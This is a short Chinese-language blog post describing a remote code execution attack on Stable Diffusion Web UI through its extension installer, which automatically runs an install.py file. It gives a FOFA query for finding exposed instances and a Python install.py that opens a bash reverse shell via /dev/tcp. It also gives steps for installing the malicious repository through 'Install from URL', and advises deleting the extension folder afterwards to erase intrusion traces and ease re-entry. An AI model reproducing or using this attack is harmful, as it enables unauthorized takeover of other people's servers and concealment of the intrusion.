Stable Diffusion RCE
## 简介 Stable Diffusion Web UI可以通过下载git文件来安装第三方插件,而插件默认通过`install.py`文件进行相关安装操作。当插件下载完毕后,会自动执行`install.py`中的代码,因此可以创建一个git仓库,利用该文件进行远程代码执行。 ## FOFA ``` Stable Diffusion checkpoint ``` ![](https://blog.coolcooltomato.com/uploads/article/sd_rce1.png) ## 漏洞利用 ### 创建仓库 创建`install.py`文件。 ![](https://blog.coolcooltomato.com/uploads/article/sd_rce2.png) 写入反弹shell。 ```python import os os.system("bash -c 'bash -i >& /dev/tcp/ip/port 0>&1' &") ``` ![](https://blog.coolcooltomato.com/uploads/article/sd_rce3.png) ### 服务器监听 监听端口。 ![](https://blog.coolcooltomato.com/uploads/article/sd_rce4.png) ### 下载恶意文件 在`Extensions`->`Install from URL`输入git文件的地址,等待安装。 ![](https://blog.coolcooltomato.com/uploads/article/sd_rce5.png) ### 接收反弹shell 此时服务器会接收到反弹shell,可以进入`extensions`目录删除与git文件同名的文件夹,消除入侵痕迹并方便再次入侵。 ![测试服务器1](https://blog.coolcooltomato.com/uploads/article/sd_rce6.png "测试服务器1") ![测试服务器2](https://blog.coolcooltomato.com/uploads/article/sd_rce7.png "测试服务器2")
创建时间:2024-02-01
|
最后修改:2024-02-27
|
©允许规范转载
酷酷番茄
首页
文章
友链